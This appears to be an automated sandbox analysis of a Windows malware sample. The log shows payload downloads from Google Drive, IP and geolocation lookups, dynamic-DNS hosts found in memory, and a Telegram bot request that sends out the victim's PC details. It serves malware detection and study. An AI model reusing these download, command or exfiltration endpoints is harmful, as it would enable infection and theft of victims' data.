          Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:49699 -> 193.122.130.0:80
          Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:49695 -> 193.122.130.0:80
          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49698 -> 104.21.80.1:443
          Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49693 -> 142.250.74.206:443
          Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1i4eTgLwUk9hJ78wr8LAtfXWd1f7g1Q0D HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: drive.google.comCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /download?id=1i4eTgLwUk9hJ78wr8LAtfXWd1f7g1Q0D&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.9:49696 version: TLS 1.0
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1i4eTgLwUk9hJ78wr8LAtfXWd1f7g1Q0D HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: drive.google.comCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /download?id=1i4eTgLwUk9hJ78wr8LAtfXWd1f7g1Q0D&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:367706%0D%0ADate%20and%20Time:%2014/03/2025%20/%2011:48:52%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20367706%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficDNS traffic detected: DNS query: drive.google.com
          Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
          Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
          Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
          Source: global trafficDNS traffic detected: DNS query: api.telegram.org
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 13 Mar 2025 12:35:03 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
          Source: Nonalined.exe, 0000000B.00000002.2269171713.0000000020251000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
          Source: Nonalined.exe, 0000000B.00000002.2269171713.0000000020251000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
          Source: Nonalined.exe, 0000000B.00000002.2269171713.0000000020251000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
          Source: Nonalined.exe, 0000000B.00000002.2254544572.00000000040D8000.00000004.00000020.00020000.00000000.sdmp, Nonalined.exe, 0000000B.00000002.2269171713.0000000020251000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
          Source: powershell.exe, 00000001.00000002.1430200400.000000000714F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.m
          Source: svchost.exe, 00000004.00000002.2251563547.0000025204400000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
          Source: qmgr.db.4.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
          Source: qmgr.db.4.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
          Source: qmgr.db.4.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
          Source: qmgr.db.4.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
          Source: qmgr.db.4.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
          Source: qmgr.db.4.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
          Source: edb.log.4.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
          Source: NDQ211216GM08.exe.bin.exe, Nonalined.exe.1.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: powershell.exe, 00000001.00000002.1428039593.0000000005A36000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
          Source: powershell.exe, 00000001.00000002.1425106652.0000000004B26000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
          Source: powershell.exe, 00000001.00000002.1425106652.0000000004B26000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
          Source: powershell.exe, 00000001.00000002.1425106652.00000000049D1000.00000004.00000800.00020000.00000000.sdmp, Nonalined.exe, 0000000B.00000002.2269171713.0000000020251000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: powershell.exe, 00000001.00000002.1425106652.0000000004B26000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
          Source: Nonalined.exe, 0000000B.00000002.2269171713.0000000020251000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
          Source: powershell.exe, 00000001.00000002.1425106652.0000000004B26000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
          Source: Nonalined.exe, 0000000B.00000002.2271230112.000000002130F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org?q=
          Source: powershell.exe, 00000001.00000002.1425106652.00000000049D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lBjr
          Source: powershell.exe, 00000001.00000002.1425106652.0000000004B26000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
          Source: Nonalined.exe, 0000000B.00000002.2269171713.0000000020335000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
          Source: Nonalined.exe, 0000000B.00000002.2269171713.0000000020335000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
          Source: Nonalined.exe, 0000000B.00000002.2269171713.0000000020335000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
          Source: Nonalined.exe, 0000000B.00000002.2269171713.0000000020335000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:367706%0D%0ADate%20a
          Source: Nonalined.exe, 0000000B.00000003.1475509525.0000000004149000.00000004.00000020.00020000.00000000.sdmp, Nonalined.exe, 0000000B.00000003.1475509525.000000000413C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
          Source: Nonalined.exe, 0000000B.00000002.2271230112.000000002130F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
          Source: Nonalined.exe, 0000000B.00000002.2271230112.0000000021564000.00000004.00000800.00020000.00000000.sdmp, Nonalined.exe, 0000000B.00000002.2271230112.000000002130F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
          Source: Nonalined.exe, 0000000B.00000002.2271230112.0000000021564000.00000004.00000800.00020000.00000000.sdmp, Nonalined.exe, 0000000B.00000002.2271230112.000000002130F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
          Source: Nonalined.exe, 0000000B.00000002.2269171713.00000000203E1000.00000004.00000800.00020000.00000000.sdmp, Nonalined.exe, 0000000B.00000002.2269171713.0000000020412000.00000004.00000800.00020000.00000000.sdmp, Nonalined.exe, 0000000B.00000002.2269171713.00000000203D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
          Source: Nonalined.exe, 0000000B.00000002.2269171713.00000000203E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en4
          Source: Nonalined.exe, 0000000B.00000002.2269171713.00000000203DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enlBjr
          Source: powershell.exe, 00000001.00000002.1428039593.0000000005A36000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
          Source: powershell.exe, 00000001.00000002.1428039593.0000000005A36000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
          Source: powershell.exe, 00000001.00000002.1428039593.0000000005A36000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
          Source: Nonalined.exe, 0000000B.00000002.2254544572.00000000040D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/9A
          Source: Nonalined.exe, 0000000B.00000002.2254544572.00000000040D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/qA
          Source: Nonalined.exe, 0000000B.00000002.2254544572.0000000004116000.00000004.00000020.00020000.00000000.sdmp, Nonalined.exe, 0000000B.00000002.2254525150.0000000004090000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1i4eTgLwUk9hJ78wr8LAtfXWd1f7g1Q0D
          Source: Nonalined.exe, 0000000B.00000002.2254544572.0000000004116000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1i4eTgLwUk9hJ78wr8LAtfXWd1f7g1Q0DRMmf
          Source: Nonalined.exe, 0000000B.00000003.1492131065.0000000004183000.00000004.00000020.00020000.00000000.sdmp, Nonalined.exe, 0000000B.00000003.1527984035.0000000004183000.00000004.00000020.00020000.00000000.sdmp, Nonalined.exe, 0000000B.00000003.1527968014.0000000004181000.00000004.00000020.00020000.00000000.sdmp, Nonalined.exe, 0000000B.00000003.1492077176.0000000004149000.00000004.00000020.00020000.00000000.sdmp, Nonalined.exe, 0000000B.00000003.1527902003.0000000004149000.00000004.00000020.00020000.00000000.sdmp, Nonalined.exe, 0000000B.00000002.2254544572.0000000004143000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
          Source: Nonalined.exe, 0000000B.00000003.1475509525.0000000004149000.00000004.00000020.00020000.00000000.sdmp, Nonalined.exe, 0000000B.00000003.1492077176.0000000004149000.00000004.00000020.00020000.00000000.sdmp, Nonalined.exe, 0000000B.00000002.2254544572.0000000004116000.00000004.00000020.00020000.00000000.sdmp, Nonalined.exe, 0000000B.00000003.1527902003.0000000004149000.00000004.00000020.00020000.00000000.sdmp, Nonalined.exe, 0000000B.00000002.2254544572.000000000412E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1i4eTgLwUk9hJ78wr8LAtfXWd1f7g1Q0D&export=download
          Source: Nonalined.exe, 0000000B.00000003.1492077176.0000000004149000.00000004.00000020.00020000.00000000.sdmp, Nonalined.exe, 0000000B.00000003.1527902003.0000000004149000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1i4eTgLwUk9hJ78wr8LAtfXWd1f7g1Q0D&export=download_
          Source: Nonalined.exe, 0000000B.00000002.2271230112.000000002130F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
          Source: Nonalined.exe, 0000000B.00000002.2271230112.0000000021564000.00000004.00000800.00020000.00000000.sdmp, Nonalined.exe, 0000000B.00000002.2271230112.000000002130F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtabv20
          Source: Nonalined.exe, 0000000B.00000002.2271230112.000000002130F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
          Source: edb.log.4.drString found in binary or memory: https://g.live.com/odclientsettings/Prod-C:
          Source: svchost.exe, 00000004.00000003.1206920172.0000025204600000.00000004.00000800.00020000.00000000.sdmp, edb.log.4.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2-C:
          Source: Nonalined.exe, 0000000B.00000002.2271230112.000000002130F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gemini.google.com/app?q=
          Source: powershell.exe, 00000001.00000002.1425106652.0000000004B26000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
          Source: powershell.exe, 00000001.00000002.1428039593.0000000005A36000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
          Source: Nonalined.exe, 0000000B.00000002.2269171713.0000000020335000.00000004.00000800.00020000.00000000.sdmp, Nonalined.exe, 0000000B.00000002.2269171713.000000002029D000.00000004.00000800.00020000.00000000.sdmp, Nonalined.exe, 0000000B.00000002.2269171713.000000002030D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
          Source: Nonalined.exe, 0000000B.00000002.2269171713.000000002029D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
          Source: Nonalined.exe, 0000000B.00000002.2269171713.00000000202C7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
          Source: Nonalined.exe, 0000000B.00000002.2269171713.0000000020335000.00000004.00000800.00020000.00000000.sdmp, Nonalined.exe, 0000000B.00000002.2269171713.000000002030D000.00000004.00000800.00020000.00000000.sdmp, Nonalined.exe, 0000000B.00000002.2269171713.00000000202C7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
          Source: Nonalined.exe, 0000000B.00000003.1475509525.0000000004149000.00000004.00000020.00020000.00000000.sdmp, Nonalined.exe, 0000000B.00000003.1475509525.000000000413C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
          Source: Nonalined.exe, 0000000B.00000002.2271230112.0000000021564000.00000004.00000800.00020000.00000000.sdmp, Nonalined.exe, 0000000B.00000002.2271230112.000000002130F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/v20Y&
          Source: Nonalined.exe, 0000000B.00000003.1475509525.0000000004149000.00000004.00000020.00020000.00000000.sdmp, Nonalined.exe, 0000000B.00000003.1475509525.000000000413C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
          Source: Nonalined.exe, 0000000B.00000003.1475509525.0000000004149000.00000004.00000020.00020000.00000000.sdmp, Nonalined.exe, 0000000B.00000003.1475509525.000000000413C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
          Source: Nonalined.exe, 0000000B.00000002.2271230112.0000000021564000.00000004.00000800.00020000.00000000.sdmp, Nonalined.exe, 0000000B.00000002.2271230112.000000002130F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
          Source: Nonalined.exe, 0000000B.00000003.1475509525.0000000004149000.00000004.00000020.00020000.00000000.sdmp, Nonalined.exe, 0000000B.00000003.1475509525.000000000413C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
          Source: Nonalined.exe, 0000000B.00000003.1475509525.0000000004149000.00000004.00000020.00020000.00000000.sdmp, Nonalined.exe, 0000000B.00000003.1475509525.000000000413C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
          Source: Nonalined.exe, 0000000B.00000002.2269171713.0000000020412000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
          Source: Nonalined.exe, 0000000B.00000002.2269171713.0000000020412000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/4
          Source: Nonalined.exe, 0000000B.00000002.2269171713.000000002040D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/lBjr
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
          Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49693 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
          Source: unknownNetwork traffic detected: HTTP traffic on port 49698 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49698
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49696
          Source: unknownNetwork traffic detected: HTTP traffic on port 49694 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49694
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49693
          Source: unknownNetwork traffic detected: HTTP traffic on port 49696 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
          Source: unknownHTTPS traffic detected: 142.250.74.206:443 -> 192.168.2.9:49693 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 142.250.186.129:443 -> 192.168.2.9:49694 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.9:49713 version: TLS 1.2
          Source: C:\Users\user\Desktop\NDQ211216GM08.exe.bin.exeCode function: 0_2_004056A8 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004056A8

          System Summary

          barindex
          Powershell drops PE file
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\Nonalined.exeJump to dropped file
          Source: C:\Users\user\Desktop\NDQ211216GM08.exe.bin.exeCode function: 0_2_004034F7 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004034F7
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_004034F7 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,LdrInitializeThunk,ExitWindowsEx,ExitProcess,11_2_004034F7
          Source: C:\Users\user\Desktop\NDQ211216GM08.exe.bin.exeFile created: C:\Windows\resources\websiders.iniJump to behavior
          Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
          Source: C:\Users\user\Desktop\NDQ211216GM08.exe.bin.exeCode function: 0_2_00406BFE0_2_00406BFE
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_0722DF381_2_0722DF38
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_00406BFE11_2_00406BFE
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_0015C19B11_2_0015C19B
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_0015D27811_2_0015D278
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_0015537011_2_00155370
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_0015C46811_2_0015C468
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_0015C73811_2_0015C738
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_0015E98811_2_0015E988
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_001569A011_2_001569A0
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_001529E011_2_001529E0
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_0015CA0811_2_0015CA08
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_0015CCD811_2_0015CCD8
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_00159DE011_2_00159DE0
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_00153E0911_2_00153E09
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_0015CFAC11_2_0015CFAC
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_00156FC811_2_00156FC8
